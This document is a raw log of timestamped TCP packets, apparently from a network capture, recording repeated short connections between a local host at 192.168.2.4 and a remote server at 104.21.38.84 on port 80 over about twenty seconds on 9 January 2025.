Jan 9, 2025 18:12:54.102591038 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.104326010 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.107635975 CET	80	49787	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.107692003 CET	49787	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.109180927 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.109247923 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.109334946 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.114177942 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.456077099 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.461983919 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.575046062 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.627979994 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.851934910 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.893718958 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.968159914 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.969609022 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.973541021 CET	80	49788	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.974551916 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:54.974632025 CET	49788	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.974740028 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.974834919 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:54.979671955 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.331338882 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.336292982 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.456799030 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.502810001 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.704859018 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.752861977 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.795664072 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.846662998 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.921077967 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.921714067 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.926088095 CET	80	49789	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.926189899 CET	49789	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.926476002 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:55.926538944 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.926630974 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:55.931440115 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.284194946 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.289067984 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.398425102 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.440427065 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.661745071 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.691586971 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.696706057 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.696796894 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.696909904 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.701724052 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.705948114 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.795073032 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.795841932 CET	49778	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.795903921 CET	49756	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.800019979 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:56.800092936 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.800209045 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:56.805042028 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.049801111 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.054615974 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.054828882 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.143429041 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.159164906 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.163958073 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.190502882 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.269793987 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.315469027 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.464409113 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.518558025 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.555706024 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.596697092 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.670388937 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.670460939 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.670541048 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.671339989 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.675472975 CET	80	49797	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.676084995 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.676147938 CET	49797	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.676192999 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.676300049 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.676513910 CET	80	49798	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.676529884 CET	80	49791	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:57.676575899 CET	49798	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.676599026 CET	49791	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:57.681008101 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.034178019 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.065036058 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.128081083 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.174704075 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.421140909 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.471580982 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.545277119 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.545845032 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.550333023 CET	80	49804	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.550394058 CET	49804	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.550652027 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.550726891 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.550849915 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.555721998 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:58.909172058 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:58.952681065 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.019953966 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.065325975 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.194550037 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.237214088 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.311055899 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.311738968 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.316190004 CET	80	49810	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.316265106 CET	49810	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.316931009 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.317049980 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.317107916 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.321959972 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.674782038 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:12:59.682532072 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.899044037 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:12:59.940320015 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.113049984 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.159064054 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.233987093 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.234667063 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.238984108 CET	80	49816	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.239032984 CET	49816	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.239413977 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.239473104 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.239593983 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.244299889 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.596703053 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:00.601571083 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.800355911 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:00.846580982 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.000638008 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.049716949 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.125830889 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.126451969 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.130923986 CET	80	49822	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.131026983 CET	49822	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.131285906 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.131381989 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.131452084 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.136262894 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.487328053 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.492185116 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.903815985 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.905703068 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.905770063 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:01.906591892 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:01.906671047 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.032649994 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.033375025 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.038062096 CET	80	49828	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.038127899 CET	49828	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.038460016 CET	80	49834	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.038527012 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.038675070 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.043646097 CET	80	49834	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.393739939 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.473143101 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.473428965 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.501594067 CET	80	49834	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.505129099 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.506464958 CET	80	49834	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.506556034 CET	49834	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.506570101 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.506709099 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.511513948 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.651571989 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.656452894 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.656558037 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.657037020 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.661874056 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:02.868545055 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:02.940319061 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.003639936 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.252826929 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.315458059 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.729639053 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.729819059 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.729887962 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.729937077 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.730001926 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.730046988 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.730056047 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.730086088 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.730204105 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.730248928 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.862214088 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.924843073 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.937808990 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.938039064 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.939374924 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.939469099 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:03.939647913 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.939806938 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.939968109 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.940434933 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.940485001 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.941804886 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.942667007 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.942878962 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:03.945383072 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.254898071 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.299751997 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.308835983 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.362493992 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.373222113 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.373394966 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.374492884 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.378535986 CET	80	49839	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.378551006 CET	80	49836	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.378602028 CET	49839	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.378673077 CET	49836	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.379298925 CET	80	49845	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.379369974 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.379728079 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.384527922 CET	80	49845	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.737432957 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:04.742326975 CET	80	49845	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.848082066 CET	80	49845	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:04.893467903 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.150727987 CET	80	49845	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:05.205986977 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.268495083 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.274432898 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:05.274498940 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.274606943 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.280679941 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:05.628025055 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.632849932 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:05.747289896 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:05.799774885 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:05.994996071 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.034095049 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.087208033 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.127887964 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.201950073 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.202516079 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.207410097 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.207592964 CET	80	49851	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.207679033 CET	49851	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.207815886 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.207815886 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.212622881 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.565427065 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.570219040 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.663371086 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.706053972 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:06.910797119 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:06.955946922 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.031270027 CET	49845	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.034986973 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.036003113 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.040018082 CET	80	49857	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.040071011 CET	49857	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.040906906 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.040972948 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.041105032 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.045821905 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.393646955 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.398576975 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.656152964 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.705948114 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:07.920737028 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:07.971565962 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.049051046 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.049766064 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.054048061 CET	80	49863	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.054120064 CET	49863	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.054594994 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.054750919 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.054881096 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.059649944 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.409207106 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.415107965 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.665637970 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.706101894 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:08.910358906 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:08.955940008 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.029601097 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.030337095 CET	49876	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.034518003 CET	80	49870	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.034600019 CET	49870	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.035146952 CET	80	49876	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.035224915 CET	49876	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.035320997 CET	49876	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.040071964 CET	80	49876	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.316447020 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.316519976 CET	49876	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.321238995 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.321343899 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.321495056 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.326857090 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.361341000 CET	80	49876	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.391324997 CET	80	49876	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.391438961 CET	49876	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.438425064 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.444333076 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.444452047 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.445003986 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.450490952 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.674895048 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.679779053 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.679908037 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.766537905 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.800045013 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.805022955 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.815360069 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:09.933749914 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:09.987196922 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.012442112 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.065465927 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.311786890 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.362209082 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.436491013 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.436506033 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.437217951 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.441761971 CET	80	49882	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.441777945 CET	80	49881	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.441849947 CET	49882	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.441876888 CET	49881	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.442080021 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.444608927 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.444719076 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.449501038 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.799870014 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:10.804770947 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.899282932 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:10.940352917 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.154808044 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.205957890 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.241369963 CET	80	49888	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.284100056 CET	49888	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.360527992 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.365432024 CET	80	49895	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.365583897 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.365864992 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.370649099 CET	80	49895	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.721690893 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:11.726521969 CET	80	49895	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.824645996 CET	80	49895	104.21.38.84	192.168.2.4
Jan 9, 2025 18:13:11.877840042 CET	49895	80	192.168.2.4	104.21.38.84
Jan 9, 2025 18:13:12.086364031 CET	80	49895	104.21.38.84	192.168.2.4
